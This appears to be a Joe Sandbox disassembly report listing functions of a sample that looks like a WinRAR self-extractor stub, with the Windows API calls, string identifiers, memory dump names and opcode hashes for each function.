                                                                                                                                                                            Function 00269AB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                            • API String ID: 322700389-393685449
                                                                                                                                                                            • Opcode ID: 08388bdacba210b75191a9f284b25879895556f55dfb66530130f6709f017132
                                                                                                                                                                            • Instruction ID: d87b44e4019437fe27b05a23b26eb3c6d20fab34543d985770f352e3f1c0a5a2
                                                                                                                                                                            • Opcode Fuzzy Hash: 08388bdacba210b75191a9f284b25879895556f55dfb66530130f6709f017132
                                                                                                                                                                            • Instruction Fuzzy Hash: 87B17C7582020AEFCF15EFA4D9819AEB7B9BF04314F14446AE8056B212DB31DAF1CF91
                                                                                                                                                                            Function 0024D990 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024D99A
                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0024D9BF
                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,?), ref: 0024DA11
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 0024DA34
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,?,?), ref: 0024DA84
                                                                                                                                                                            • MoveFileW.KERNEL32(-00000040,-00000028), ref: 0024DC9F
                                                                                                                                                                            • MoveFileW.KERNEL32(-00000028,-00000040), ref: 0024DCEC
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                                                                                                                                            • String ID: rtmp
                                                                                                                                                                            • API String ID: 2388273531-870060881
                                                                                                                                                                            • Opcode ID: 54d7d21a4e05bce528b53d44b9072c865b3b6707cd9a19b4591887759c1a81bc
                                                                                                                                                                            • Instruction ID: 220d9c78d84a9c543a6e8639817c685a36796f28d78cd27680c077101df3bb4b
                                                                                                                                                                            • Opcode Fuzzy Hash: 54d7d21a4e05bce528b53d44b9072c865b3b6707cd9a19b4591887759c1a81bc
                                                                                                                                                                            • Instruction Fuzzy Hash: FBB15770D20228DACF28DFA4CC89BDDBBB9BF15305F444099E449A7251DB309BA9CF60
                                                                                                                                                                            Function 00251E54 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 215COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3__wcslen
                                                                                                                                                                            • String ID: .rar$exe$rar$sfx
                                                                                                                                                                            • API String ID: 3251556500-630704357
                                                                                                                                                                            • Opcode ID: 987217874ae30a85bd4ea1390474a5518c4e8971631e1719f3dd7e7740960db2
                                                                                                                                                                            • Instruction ID: e1a20a40ce093577d39afebd19af829e3ed4273cf530089f46c2b0fa946d91d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 987217874ae30a85bd4ea1390474a5518c4e8971631e1719f3dd7e7740960db2
                                                                                                                                                                            • Instruction Fuzzy Hash: 3871E630A21710DBCB21DF68C941BADB7B8AF59711F20051EFC819B2D1DB7159BACB58
                                                                                                                                                                            Function 0025F1EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0025F1F5
                                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0025F224
                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0025F2BC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectRelease
                                                                                                                                                                            • String ID: )K&$DK&$NK&$lK&$vK&
                                                                                                                                                                            • API String ID: 1429681911-3736163604
                                                                                                                                                                            • Opcode ID: fa4f56f825c663e0363e81abcdf4279f44be3574fd4f0b743d7726568b1dc21c
                                                                                                                                                                            • Instruction ID: bb0122a2754e6e6d32acdf5ea7214391a99cff445e21da83d6aa7e64a3774c83
                                                                                                                                                                            • Opcode Fuzzy Hash: fa4f56f825c663e0363e81abcdf4279f44be3574fd4f0b743d7726568b1dc21c
                                                                                                                                                                            • Instruction Fuzzy Hash: D721E67211C314AFD7019FA1EC4CE6BBFA9FB89351F04092AFA4592220D63199658B62
                                                                                                                                                                            Function 002653D0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,002504AB,002504AD,00000000,00000000,6294DA82,00000001,00000000,00000000,?,0025038C,?,00000004,002504AB,ROOT\CIMV2), ref: 00265459
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,002504AB,?,00000000,00000000,?,?,0025038C,?,00000004,002504AB), ref: 002654D4
                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 002654DF
                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00265508
                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00265512
                                                                                                                                                                            • GetLastError.KERNEL32(80070057,6294DA82,00000001,00000000,00000000,?,0025038C,?,00000004,002504AB,ROOT\CIMV2), ref: 00265517
                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 0026552A
                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,0025038C,?,00000004,002504AB,ROOT\CIMV2), ref: 00265540
                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00265553
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1353541977-0
                                                                                                                                                                            • Opcode ID: 845f52954da7e4acada8a13db1980adad50ae47c48e6b1494553e2d4974c8519
                                                                                                                                                                            • Instruction ID: e77b2c3a9a38d60add9af9fa2f2bd9281cd9a034096295b2f8f2bffb04ee12cd
                                                                                                                                                                            • Opcode Fuzzy Hash: 845f52954da7e4acada8a13db1980adad50ae47c48e6b1494553e2d4974c8519
                                                                                                                                                                            • Instruction Fuzzy Hash: C5413B71A20625EBCB109F68DC49BAEB7A8EF48710F504269F40AD7240DB3498E0CBA4
                                                                                                                                                                            Function 00250469 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 197COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00250470
                                                                                                                                                                              • Part of subcall function 00250360: __EH_prolog3.LIBCMT ref: 00250367
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002505FA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3$ClearVariant
                                                                                                                                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                            • API String ID: 4196654922-3505469590
                                                                                                                                                                            • Opcode ID: 6d8d0949ca62ef17f79e8ee39ce77a0f644818f35981523ba1f88881990a4621
                                                                                                                                                                            • Instruction ID: e58082171208eba4de17a5f73a7a849341e9e0e401659c0254447cebaf4b7790
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d8d0949ca62ef17f79e8ee39ce77a0f644818f35981523ba1f88881990a4621
                                                                                                                                                                            • Instruction Fuzzy Hash: 43615970A20219AFDB14DFA4DC99AAEB7B8FF48311B14405CF906A72A0CB30AD15CF64
                                                                                                                                                                            Function 0025E07E Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_wcslen
                                                                                                                                                                            • String ID: $</p>$</style>$<br>$<style>
                                                                                                                                                                            • API String ID: 3746244732-3393513139
                                                                                                                                                                            • Opcode ID: aa737f04c7938cdd2c01021793750f255c5228ae67663765433c24a29e519460
                                                                                                                                                                            • Instruction ID: 73b4eb9a022bf7d37b4514c5111b4f730406bab9d2ba90f71f06c78961e7b6e7
                                                                                                                                                                            • Opcode Fuzzy Hash: aa737f04c7938cdd2c01021793750f255c5228ae67663765433c24a29e519460
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51F835B3071356DF389E24881177A72B5AF64743F568019ED89AB2C0EB758FB88398
                                                                                                                                                                            Function 0025E265 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0025E26C
                                                                                                                                                                            • ShowWindow.USER32(?,00000000,00000038), ref: 0025E294
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0025E2D8
                                                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 0025E373
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0025E394
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$H_prolog3_Rect
                                                                                                                                                                            • String ID: RarHtmlClassName$gI&
                                                                                                                                                                            • API String ID: 950582801-3320532055
                                                                                                                                                                            • Opcode ID: b47af39e1c2878601e2a2578c6ef75e85845edfdce54ee3fc0e89b7ba32b4641
                                                                                                                                                                            • Instruction ID: 2c6ca955352ff45e0a98e0cd61d606fd837c321cf8d3f0a0667096ee08e23aab
                                                                                                                                                                            • Opcode Fuzzy Hash: b47af39e1c2878601e2a2578c6ef75e85845edfdce54ee3fc0e89b7ba32b4641
                                                                                                                                                                            • Instruction Fuzzy Hash: 11418971910204EFDF159FA4EC89AAE7BB8EF48301F05405AFD08AB155DB309A65CF64
                                                                                                                                                                            Function 00264D5F Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00264DDA,00264D3D,00264FDE), ref: 00264D76
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00264D8C
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00264DA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive$p])
                                                                                                                                                                            • API String ID: 667068680-4009524389
                                                                                                                                                                            • Opcode ID: 190654f6bc2d83d11ae5d179bb157d89ff8ddffd45b1069fd86296c84e558e1b
                                                                                                                                                                            • Instruction ID: b0563ffd1cb61f49295fddf101ae2bd3ede73ea841f7947cf0427c16c7200abd
                                                                                                                                                                            • Opcode Fuzzy Hash: 190654f6bc2d83d11ae5d179bb157d89ff8ddffd45b1069fd86296c84e558e1b
                                                                                                                                                                            • Instruction Fuzzy Hash: F5F0C272F31A23EB0F627E746C887BA22DCAB077593114139D685D2280E660CCF087E0
                                                                                                                                                                            Function 00257818 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0025783D
                                                                                                                                                                              • Part of subcall function 0025067E: GetVersionExW.KERNEL32(?), ref: 002506AF
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00257860
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00257872
                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00257883
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00257893
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 002578A3
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002578DE
                                                                                                                                                                            • __aullrem.LIBCMT ref: 00257984
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1247370737-0
                                                                                                                                                                            • Opcode ID: 1767b7a70bfd8959a9d6fd99a9d0778ccc0f2a9ed44a57fea19e4f308a8082d3
                                                                                                                                                                            • Instruction ID: 3e4f022131023c695a6b7faa53dc10923897be33482ecd52d5eb5a2301eec125
                                                                                                                                                                            • Opcode Fuzzy Hash: 1767b7a70bfd8959a9d6fd99a9d0778ccc0f2a9ed44a57fea19e4f308a8082d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 025169B15083019FC700DF64D88496BF7E9FF88315F40892EF99AC2210E734E558CB62
                                                                                                                                                                            Function 00262B26 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00262B66
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                              • Part of subcall function 00250BF3: _wcslen.LIBCMT ref: 00250C03
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00262EDA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$DialogPathTemp
                                                                                                                                                                            • String ID: $@set:user$\S)$\S)
                                                                                                                                                                            • API String ID: 2172748170-3392452889
                                                                                                                                                                            • Opcode ID: 13b9b1fb80c2da05565bff3928a9207cfa19a206ff7efc4de274a05d7cd0dd9f
                                                                                                                                                                            • Instruction ID: 7a66c4b0bf79eaf6e5e26087cfebb5ff85960a6581eafdce2751222419bb6563
                                                                                                                                                                            • Opcode Fuzzy Hash: 13b9b1fb80c2da05565bff3928a9207cfa19a206ff7efc4de274a05d7cd0dd9f
                                                                                                                                                                            • Instruction Fuzzy Hash: BBC14B70D21269DADF25EBA4CC45BDDB7B8AF15300F4400AAE849B3242DB705BD9CF50
                                                                                                                                                                            Function 00262493 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 216windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 002626A9
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,00295380), ref: 002626D6
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00262702
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002634F2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$H_prolog3_Item
                                                                                                                                                                            • String ID: @U=u$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                            • API String ID: 4098331016-3965713946
                                                                                                                                                                            • Opcode ID: 552e106c1cb4ef3743eee352368597a58fc11f67bdfa18f80f8f0099fc4eee11
                                                                                                                                                                            • Instruction ID: ee7dd9cdb7c52b2bd114e81b4ac5776d3eb8bfde643afbb79da72d93af095e2c
                                                                                                                                                                            • Opcode Fuzzy Hash: 552e106c1cb4ef3743eee352368597a58fc11f67bdfa18f80f8f0099fc4eee11
                                                                                                                                                                            • Instruction Fuzzy Hash: 8A816D31920659DECF28EFA0C891BEDB778AF18310F54009AE546B7181EB705BE9CF60
                                                                                                                                                                            Function 00250E49 Relevance: 10.7, APIs: 7, Instructions: 197COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00250E50
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00250E85
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00250EC4
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00250ED4
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00250F51
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00250F93
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00250FA3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FullNamePath$_wcslen$H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 840513527-0
                                                                                                                                                                            • Opcode ID: 27c6c4aae17e794a5113778a6a274e671e849093ab1c8ccf50a2a7ce52641dfe
